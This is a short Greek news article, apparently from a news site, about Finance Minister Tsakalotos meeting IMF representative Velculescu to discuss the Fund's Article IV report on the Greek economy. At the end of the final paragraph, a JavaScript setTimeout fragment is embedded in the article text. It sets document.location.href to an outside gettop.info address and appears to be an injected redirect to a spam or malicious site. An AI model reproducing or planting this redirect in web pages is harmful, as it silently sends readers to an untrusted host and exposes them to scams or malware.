Συνάντηση Τσακαλώτου – Βελκουλέσκου για την έκθεση του ΔΝΤ

0
5

 

Στην Αθήνα παρέμεινε η εκπρόσωπος του ΔΝΤ Ντέλια Βελκουλέσκου-αν και οι ευρωπαίκοί θεσμοί αποχώρηαν την Παρασκευή-προκειμένου να συζητήσει περαιτέρω με τον Έλληνα υπουργό Οικονομικών Ευκλείδη Τσακαλώτο την έκθεση του Ταμείου για την ελληνική οικονομία.

Συγκεκριμένα, σύμφωνα με πηγές του υπουργείου, η συνάντηση, που διήρκεσε περίπου 1,5 ώρα, ήταν «εισαγωγική» και αφορούσε στα στοιχεία που συλλέγει το Ταμείο για την έκθεσή του για την ελληνική οικονομία. Ενδέχεται δε, να υπάρξει ακόμη μία συνάντηση κατά το κλείσιμο της διαδικασίας αυτής.

Το κλιμάκιο του ΔΝΤ έχει παραμείνει στην Αθήνα, προκειμένου να συλλέξει στοιχεία για την ελληνική οικονομία, στο πλαίσιο της ετήσιας έκθεσης του Ταμείου για όλα τα κράτη εκτός προγράμματος (έκθεση Άρθρου 4).

Για την Ελλάδα, το ΔΝΤ συνέτασσε τη συγκεκριμένη έκθεση έως το 2010 και εν συνεχεία το 2013. Η δημοσίευση της έκθεσης αναμένεται τον προσεχή Νοέμβριο και κατά πάσα πιθανότητα θα αποτελέσει και τη βάση για την Έκθεση Βιωσιμότητας (DSA) που θα συντάξει το ΔΝΤ για το ελληνικό χρέος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here